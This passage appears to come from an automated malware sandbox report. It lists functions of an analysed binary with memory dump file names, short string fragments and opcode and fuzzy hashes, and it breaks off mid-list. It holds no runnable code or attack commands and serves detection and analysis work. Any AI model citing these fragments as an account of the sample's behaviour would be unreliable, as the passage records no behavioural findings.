                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @A$lPLN$svfZ$IK
                              • API String ID: 0-1806543684
                              • Opcode ID: df672c68a26334545e16849cd9e363aa4f57f2bc903f677b33558ec8f31dad68
                              • Instruction ID: dfc800ca8de9153d3b1cb55365f93eb913111325a5944649362736cbb407c29d
                              • Opcode Fuzzy Hash: df672c68a26334545e16849cd9e363aa4f57f2bc903f677b33558ec8f31dad68
                              • Instruction Fuzzy Hash: 31C1067165C3898BD3258E64D4A137FFBE2ABC2740F18893CE5E94B385D7758C099B82
                              Function 00315E90 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @J$KP$VD$ra1
                              • API String ID: 0-2326683248
                              • Opcode ID: f121014aa48cabe09586cd1f1925808b0d29be6f46397f968a54cba6175ffdc1
                              • Instruction ID: ad5f839dd45231358dca33cbd96359623ad07252099481cdd8f1b125db819750
                              • Opcode Fuzzy Hash: f121014aa48cabe09586cd1f1925808b0d29be6f46397f968a54cba6175ffdc1
                              • Instruction Fuzzy Hash: 6A9162B2704B05AFE725CF64C881BABBBB1FB86310F14452CE5959B781C374A816CB92
                              Function 002F4040 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$)$IEND
                              • API String ID: 0-588110143
                              • Opcode ID: 60edb3fe63b0c0ad832856c63e70e71507179affa4fb213f84d8e23b2395846a
                              • Instruction ID: 5f65a001380c3dae552b3c9c68fe5a93b798304ed30f75cefbce5ea03206dece
                              • Opcode Fuzzy Hash: 60edb3fe63b0c0ad832856c63e70e71507179affa4fb213f84d8e23b2395846a
                              • Instruction Fuzzy Hash: 52F12471A147099BE314EF28D85172BFBE0BB94344F04463DFA959B391D7B4E924CB82
                              Function 002FC02B Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PQ$A_$IG
                              • API String ID: 0-2179527320
                              • Opcode ID: 67fff2dfb85189e761182fd3373c8c006af1258e43200798a8d354bcc12828c0
                              • Instruction ID: b2dfd57f3a64690931b6615939e78212cba9d1e989ef0f0e2fbab81ef5f297c4
                              • Opcode Fuzzy Hash: 67fff2dfb85189e761182fd3373c8c006af1258e43200798a8d354bcc12828c0
                              • Instruction Fuzzy Hash: DA41CAB001C34A8AC704CF21D89267BF7F0FF92798F249A1DE1C58B295E7348546CB4A
                              Function 0032C040 Relevance: 3.1, Strings: 2, Instructions: 624COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: f$
                              • API String ID: 2994545307-508322865
                              • Opcode ID: 3e21b31f4d26d6bc6ec7a4020888825dee1d994122bed6a21428730184be1f42
                              • Instruction ID: 54efaee7c3afc9b4074e61107e3742aace06887e8fd151d3b2a46c30fcb42a69
                              • Opcode Fuzzy Hash: 3e21b31f4d26d6bc6ec7a4020888825dee1d994122bed6a21428730184be1f42
                              • Instruction Fuzzy Hash: F81215702183519FD716CF29E890A2FBBE5EFC9714F259A2CE59587292C730EC41CB92
                              Function 003224E0 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                              Download Yara Rule
                              Strings
                              • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00322591
                              • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 003225D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                              • API String ID: 0-2492670020
                              • Opcode ID: 64605ba2ccee3835b56bd4069fcc3a6928f66c549fe97023459c2a5379d5bcfb
                              • Instruction ID: 0cb11b68a47249e8592597a010bb213fd435414a99e4a2547f35e7fa09634173
                              • Opcode Fuzzy Hash: 64605ba2ccee3835b56bd4069fcc3a6928f66c549fe97023459c2a5379d5bcfb
                              • Instruction Fuzzy Hash: 73814B33A086A15BCB1A8E3CAC913ABBB965F97330F3DC3A9D8719B3D5C1658D058351
                              Function 002FE970 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: efg`$efg`
                              • API String ID: 0-3010568471
                              • Opcode ID: bd9225fb1788c6edeec95a0e5923aca8fa4cb5b9734b9876f763a4c182a7a3f9
                              • Instruction ID: ae131c6c686d51d759bb45480281432383740071f980d1ba56aba6e25bd4d371
                              • Opcode Fuzzy Hash: bd9225fb1788c6edeec95a0e5923aca8fa4cb5b9734b9876f763a4c182a7a3f9
                              • Instruction Fuzzy Hash: 1131E132A283558BC729DF50D59166FF392ABE4340F5A453CEA8627621CB709E0AC7D2
                              Function 004B54F3 Relevance: 2.4, Strings: 1, Instructions: 1109COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: wo{
                              • API String ID: 0-1599316095
                              • Opcode ID: 01c022777eebcce1256b02a3051b146b4303bc9a353b43c8b68717c5af2bf60e
                              • Instruction ID: 996673c28335215ceca2097f59950346691b90d7df23fe0e172912bcae19408f
                              • Opcode Fuzzy Hash: 01c022777eebcce1256b02a3051b146b4303bc9a353b43c8b68717c5af2bf60e
                              • Instruction Fuzzy Hash: CF7229F360C204AFE314AE2DEC8567AFBE9EF94720F16453DE6C4C3740EA7558018696
                              Function 00318CB0 Relevance: 1.7, Strings: 1, Instructions: 490COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: st@
                              • API String ID: 0-3741395493
                              • Opcode ID: ab7ce971145202d144a2735b82165732fdca708fd9cad15a74d00240cf36f375
                              • Instruction ID: 03aebebf23b6b350a9e671ec42aa6e5667d13103387c8f050819ca67d43f7e2c
                              • Opcode Fuzzy Hash: ab7ce971145202d144a2735b82165732fdca708fd9cad15a74d00240cf36f375
                              • Instruction Fuzzy Hash: 56F148B150C381CFD3198F24D89036BBBE6AF99304F19887DE5C58B282D775D94ACB92
                              Function 00318770 Relevance: 1.7, Strings: 1, Instructions: 466COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: =:;8
                              • API String ID: 2994545307-508151936
                              • Opcode ID: cfe927e97853b7ca9d80c5ed561d278835c1bfea4f32f1149c24c556b67573e9
                              • Instruction ID: b2787bca073e5158b30e935cdac5a9fb9d75b27694da816b32ea7207f3618719
                              • Opcode Fuzzy Hash: cfe927e97853b7ca9d80c5ed561d278835c1bfea4f32f1149c24c556b67573e9
                              • Instruction Fuzzy Hash: DFD15BB2A583118BD719CB28CC822BBB796EFC9304F1A853DD9864B381DA749C46C795
                              Function 00309530 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: efg`
                              • API String ID: 0-115929991
                              • Opcode ID: 4ef0c89d32e676d3e80e868b29bcff16a34ed33deb9dcca1e9f150b0c8c388cc
                              • Instruction ID: 2428c5b921c7a55b4923a1cd8e1d9bc17254a844763f9b6fae42a019e454a835
                              • Opcode Fuzzy Hash: 4ef0c89d32e676d3e80e868b29bcff16a34ed33deb9dcca1e9f150b0c8c388cc
                              • Instruction Fuzzy Hash: 37C11571D10215DFCB268F58DCA2BBB73B4FF46310F198169E942972D2E734A911CBA0
                              Function 00330F60 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: _^]\
                              • API String ID: 2994545307-3116432788
                              • Opcode ID: f00374d783c954c1fa869970935673f089bf0695b8c323b1ee3e84d17f01ad72
                              • Instruction ID: aef46ea323ca9a6f65fc23b7a96c8c7699ac9ba605bf16baf8812c169ddc5b2d
                              • Opcode Fuzzy Hash: f00374d783c954c1fa869970935673f089bf0695b8c323b1ee3e84d17f01ad72
                              • Instruction Fuzzy Hash: 1381CC756083418FC71ADF18D4A0A2AB7F2FF99710F06996CE9819B365E731EC51CB82
                              Function 002F61A0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,
                              • API String ID: 0-3772416878
                              • Opcode ID: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                              • Instruction ID: 9af18a0830aead61c3619e3e32828a5869bbff18a612caee8742d9fac438a4e1
                              • Opcode Fuzzy Hash: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                              • Instruction Fuzzy Hash: C9B148701083859FD321CF58C89462BFBE0AFA9704F484E2DE5D997742D671EA18CBA7
                              Function 0032BCE0 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
